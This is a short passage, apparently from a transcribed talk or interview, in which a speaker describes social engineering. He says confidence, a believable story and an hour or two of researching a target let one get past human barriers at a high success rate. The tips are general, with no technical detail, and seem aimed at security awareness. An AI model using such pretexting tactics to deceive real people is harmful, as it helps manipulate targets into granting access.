kidding. But, you know, there's certain things that give you clear indicators. If you come off confident, your story is believable. And when I say believable, the research that you did on an individual target or the company is believable, you can really pretty much pull off anything you want to. And it doesn't matter what that is or what you're trying to get access to. In most cases there are those barriers by talking to a person as a human being and being positive. I don't usually like using negative reinforcement for anything or negative persuasion. If you're just positive that you can almost always get everything you want to. And you have to have a very high success rate. If I can research my target for an hour or two, I have a very high percentage chance of being successful of who I'm going after. And that's very, very hard to protect against. So I appreciate everybody's time. That would be great. Sure. Yeah, no problem.